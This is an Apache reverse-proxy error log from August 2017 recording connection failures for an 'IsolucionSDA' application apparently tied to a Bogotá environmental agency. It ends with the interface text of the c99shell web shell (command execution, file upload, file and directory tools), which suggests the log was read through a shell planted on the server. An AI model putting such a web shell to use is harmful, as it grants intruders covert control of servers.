[Thu Aug 10 12:08:55.250864 2017] [proxy:error] [pid 5492:tid 16932] [client 201.245.192.253:24937] AH00898: Error reading from remote server returned by /IsolucionSDA/g/shim.gif, referer: http://190.27.245.106/IsolucionSDA/IdentificaUsuario.asp?Pagina1=FrameSetGeneral.asp&
[Thu Aug 10 12:09:11.506093 2017] [proxy_http:error] [pid 5492:tid 16776] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:26601] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Thu Aug 10 12:09:11.506093 2017] [proxy:error] [pid 5492:tid 16776] [client 201.245.192.253:26601] AH00898: Error reading from remote server returned by /IsolucionSDA/MagazinHome.asp, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Thu Aug 10 12:09:53.735367 2017] [proxy_http:error] [pid 5492:tid 16508] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 200.13.203.5:16201] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Thu Aug 10 12:09:53.735367 2017] [proxy:error] [pid 5492:tid 16508] [client 200.13.203.5:16201] AH00898: Error reading from remote server returned by /isolucionsda/BarraTitulos.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Thu Aug 10 12:09:53.735367 2017] [proxy_http:error] [pid 5492:tid 16900] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 200.13.203.5:16202] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Thu Aug 10 12:09:53.735367 2017] [proxy:error] [pid 5492:tid 16900] [client 200.13.203.5:16202] AH00898: Error reading from remote server returned by /isolucionsda/MagazinHome.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Thu Aug 10 12:38:45.790809 2017] [proxy_http:error] [pid 5492:tid 15856] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:28468] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Thu Aug 10 12:38:45.790809 2017] [proxy:error] [pid 5492:tid 15856] [client 201.245.192.253:28468] AH00898: Error reading from remote server returned by /isolucionsda/BarraFavoritos.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Thu Aug 10 12:38:45.837609 2017] [proxy_http:error] [pid 5492:tid 14804] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:28469] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina1=FrameSetGeneral.asp&&Pagina=MagazinHome.asp
[Thu Aug 10 12:38:45.837609 2017] [proxy:error] [pid 5492:tid 14804] [client 201.245.192.253:28469] AH00898: Error reading from remote server returned by /isolucionsda/Session.asp, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina1=FrameSetGeneral.asp&&Pagina=MagazinHome.asp
[Thu Aug 10 13:22:05.489575 2017] [proxy_http:error] [pid 5492:tid 14820] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:11379] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Thu Aug 10 13:23:36.718536 2017] [proxy_http:error] [pid 5492:tid 15156] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:24523] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Thu Aug 10 13:23:36.718536 2017] [proxy:error] [pid 5492:tid 15156] [client 201.245.192.253:24523] AH00898: Error reading from remote server returned by /isolucionsda/BarraFavoritos.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Thu Aug 10 13:23:36.827736 2017] [proxy_http:error] [pid 5492:tid 15824] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:24526] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina1=FrameSetGeneral.asp&&Pagina=MagazinHome.asp
[Thu Aug 10 13:23:36.827736 2017] [proxy:error] [pid 5492:tid 15824] [client 201.245.192.253:24526] AH00898: Error reading from remote server returned by /isolucionsda/Session.asp, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina1=FrameSetGeneral.asp&&Pagina=MagazinHome.asp
[Thu Aug 10 13:31:13.643338 2017] [proxy_http:error] [pid 5492:tid 16296] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:17410] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/FrameSetArticulo.asp?Pagina=/IsolucionSDA/bancoconocimiento/R/Resolucion208de23Febrero2010/Resolucion208de23Febrero2010.asp?IdArticulo=3591
[Thu Aug 10 13:31:13.643338 2017] [proxy:error] [pid 5492:tid 16296] [client 201.245.192.253:17410] AH00898: Error reading from remote server returned by /IsolucionSDA/bancoconocimiento/R/Resolucion208de23Febrero2010/Resolucion208de23Febrero2010.asp, referer: http://190.27.245.106/IsolucionSDA/FrameSetArticulo.asp?Pagina=/IsolucionSDA/bancoconocimiento/R/Resolucion208de23Febrero2010/Resolucion208de23Febrero2010.asp?IdArticulo=3591
[Thu Aug 10 13:42:38.281741 2017] [proxy_http:error] [pid 5492:tid 14652] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 181.63.64.212:59123] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=4
[Thu Aug 10 13:42:38.281741 2017] [proxy:error] [pid 5492:tid 14652] [client 181.63.64.212:59123] AH00898: Error reading from remote server returned by /isolucionsda/Menu.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=4
[Thu Aug 10 13:54:07.476351 2017] [proxy_http:error] [pid 5492:tid 16852] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:21114] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/Session.asp
[Thu Aug 10 13:54:07.476351 2017] [proxy:error] [pid 5492:tid 16852] [client 201.245.192.253:21114] AH00898: Error reading from remote server returned by /IsolucionSDA/Session.asp, referer: http://190.27.245.106/IsolucionSDA/Session.asp
[Thu Aug 10 14:10:02.104428 2017] [proxy_http:error] [pid 5492:tid 15244] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 181.63.64.212:59627] AH01102: error reading status line from remote server 172.22.1.31:80
[Thu Aug 10 14:10:02.104428 2017] [proxy:error] [pid 5492:tid 15244] [client 181.63.64.212:59627] AH00898: Error reading from remote server returned by /isolucionsda/Session.asp
[Thu Aug 10 14:20:22.252317 2017] [proxy_http:error] [pid 5492:tid 16540] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:31033] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=4
[Thu Aug 10 14:20:27.868327 2017] [proxy_http:error] [pid 5492:tid 14596] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:31307] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/BarraTitulos.asp?Pagina1=FrameSetGeneral.asp&&Pagina=MagazinHome.asp
[Thu Aug 10 14:20:27.868327 2017] [proxy:error] [pid 5492:tid 14596] [client 201.245.192.253:31307] AH00898: Error reading from remote server returned by /isolucionsda/g/Bgr_BarraCurva2.jpg, referer: http://190.27.245.106/isolucionsda/BarraTitulos.asp?Pagina1=FrameSetGeneral.asp&&Pagina=MagazinHome.asp
[Thu Aug 10 14:20:29.693530 2017] [proxy_http:error] [pid 5492:tid 15576] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:31309] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Thu Aug 10 14:20:29.693530 2017] [proxy:error] [pid 5492:tid 15576] [client 201.245.192.253:31309] AH00898: Error reading from remote server returned by /isolucionsda/Encabezado.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Thu Aug 10 14:20:31.565533 2017] [proxy_http:error] [pid 5492:tid 16760] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:30509] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Thu Aug 10 15:36:17.383318 2017] [proxy_http:error] [pid 5492:tid 16436] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:18547] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Thu Aug 10 15:36:17.383318 2017] [proxy:error] [pid 5492:tid 16436] [client 201.245.192.253:18547] AH00898: Error reading from remote server returned by /isolucionsda/MagazinHome.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Thu Aug 10 15:55:15.749517 2017] [mpm_winnt:warn] [pid 5492:tid 17616] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Aug 10 16:00:03.351622 2017] [mpm_winnt:warn] [pid 5492:tid 17616] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Aug 10 16:24:33.654205 2017] [mpm_winnt:warn] [pid 5492:tid 17616] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Aug 10 17:01:25.770290 2017] [mpm_winnt:warn] [pid 5492:tid 17616] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Aug 10 17:01:25.770290 2017] [mpm_winnt:warn] [pid 5492:tid 17616] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Aug 10 17:07:07.192490 2017] [proxy_http:error] [pid 5492:tid 16652] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:33390] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina1=FrameSetGeneral.asp&&Pagina=MagazinHome.asp
[Thu Aug 10 18:12:40.350398 2017] [proxy_http:error] [pid 5492:tid 14700] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:25151] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=SucursalSeleccion.asp&CargaPagina=ModuloProcesos&IdModulo=3
[Thu Aug 10 18:12:40.350398 2017] [proxy:error] [pid 5492:tid 14700] [client 201.245.192.253:25151] AH00898: Error reading from remote server returned by /isolucionsda/BarraFavoritos.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=SucursalSeleccion.asp&CargaPagina=ModuloProcesos&IdModulo=3
[Thu Aug 10 18:19:01.880268 2017] [core:error] [pid 5492:tid 16500] (20024)The given path is misformatted or contained invalid characters: [client 207.46.13.23:20737] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.1 to file
[Thu Aug 10 18:25:38.792766 2017] [proxy_http:error] [pid 5492:tid 14516] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:23679] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/ReportesBase.asp
[Thu Aug 10 18:25:38.792766 2017] [proxy:error] [pid 5492:tid 14516] [client 201.245.192.253:23679] AH00898: Error reading from remote server returned by /isolucionsda/g/Ico_DebajoMeta.gif, referer: http://190.27.245.106/isolucionsda/ReportesBase.asp
[Thu Aug 10 18:25:38.808366 2017] [proxy_http:error] [pid 5492:tid 14604] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:23613] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/ReportesBase.asp
[Thu Aug 10 18:25:38.808366 2017] [proxy:error] [pid 5492:tid 14604] [client 201.245.192.253:23613] AH00898: Error reading from remote server returned by /isolucionsda/g/imgsi.gif, referer: http://190.27.245.106/isolucionsda/ReportesBase.asp
[Thu Aug 10 18:38:45.720548 2017] [proxy_http:error] [pid 5492:tid 15912] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:10897] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Thu Aug 10 18:38:45.720548 2017] [proxy:error] [pid 5492:tid 15912] [client 201.245.192.253:10897] AH00898: Error reading from remote server returned by /isolucionsda/MagazinHome.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Thu Aug 10 19:31:38.314720 2017] [mpm_winnt:warn] [pid 5492:tid 17616] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Aug 10 20:07:37.420912 2017] [mpm_winnt:warn] [pid 5492:tid 17616] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Aug 10 20:08:08.418167 2017] [mpm_winnt:warn] [pid 5492:tid 17616] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Aug 10 21:35:39.404990 2017] [core:error] [pid 5492:tid 14516] (20024)The given path is misformatted or contained invalid characters: [client 188.165.233.34:43338] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.1 to file
[Thu Aug 10 21:46:11.954901 2017] [core:error] [pid 5492:tid 14580] (20024)The given path is misformatted or contained invalid characters: [client 40.77.167.53:4602] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.1 to file
[Thu Aug 10 22:19:09.586974 2017] [mpm_winnt:warn] [pid 5492:tid 17616] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Aug 10 22:19:09.586974 2017] [mpm_winnt:warn] [pid 5492:tid 17616] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Aug 10 22:54:17.057076 2017] [mpm_winnt:warn] [pid 5492:tid 17616] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Aug 10 23:41:33.189858 2017] [mpm_winnt:warn] [pid 5492:tid 17616] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--